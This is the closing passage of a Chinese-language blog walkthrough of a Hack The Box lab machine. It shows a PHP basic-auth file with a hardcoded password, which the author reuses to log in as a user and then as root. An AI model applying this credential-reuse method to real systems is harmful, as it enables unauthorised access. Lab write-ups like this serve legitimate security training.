<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$valid_username</span> = <span class="string">&#x27;admin&#x27;</span>;</span><br><span class="line"><span class="variable">$valid_password</span> = <span class="string">&#x27;IKw75eR0MR7CMIxhH0&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_USER&#x27;</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_PW&#x27;</span>]) || </span><br><span class="line">    <span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_USER&#x27;</span>] != <span class="variable">$valid_username</span> || <span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_PW&#x27;</span>] != <span class="variable">$valid_password</span>) &#123;</span><br><span class="line">    </span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&#x27;WWW-Authenticate: Basic realm=&quot;Employee Management&quot;&#x27;</span>);</span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&#x27;HTTP/1.0 401 Unauthorized&#x27;</span>);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: dashboard.php&#x27;</span>);</span><br><span class="line"><span class="keyword">exit</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>有个密码 <code>IKw75eR0MR7CMIxhH0</code></p>
<p>这个应该是jobert的密码，登陆试一下</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719220734916.png" alt="image-20250719220734916"></p>
<p>他是admin用户，我们也尝试了root，直接拿到root权限了</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719220831149.png" alt="image-20250719220831149"></p>
<p>这台靶机就被我们拿下了</p>
<p><span style="font-size:1.9em;">happy hacking ~</span></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/HTB%E9%9D%B6%E6%9C%BA/" rel="tag"># HTB靶机</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/07/06/HTB-Strutted-%E9%9D%B6%E6%9C%BA%E4%B8%8E-CVE-2024-53677/" rel="prev" title="HTB Strutted 靶机与 CVE-2024-53677">
      <i class="fa fa-chevron-left"></i> HTB Strutted 靶机与 CVE-2024-53677
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/08/03/javaRveShell%E5%9F%BA%E7%A1%80/" rel="next" title="javaRveShell基础">
      javaRveShell基础 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#HTB-cat-%E9%9D%B6%E6%9C%BA"><span class="nav-number">1.</span> <span class="nav-text">HTB-cat 靶机</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#nmap-%E6%89%AB%E6%8F%8F"><span class="nav-number">1.1.</span> <span class="nav-text">nmap 扫描</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="nav-number">1.2.</span> <span class="nav-text">源码审计</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AB%8B%E8%B6%B3%E7%82%B9"><span class="nav-number">1.3.</span> <span class="nav-text">立足点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">1.4.</span> <span class="nav-text">提权</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">lingx5</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lingx5</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
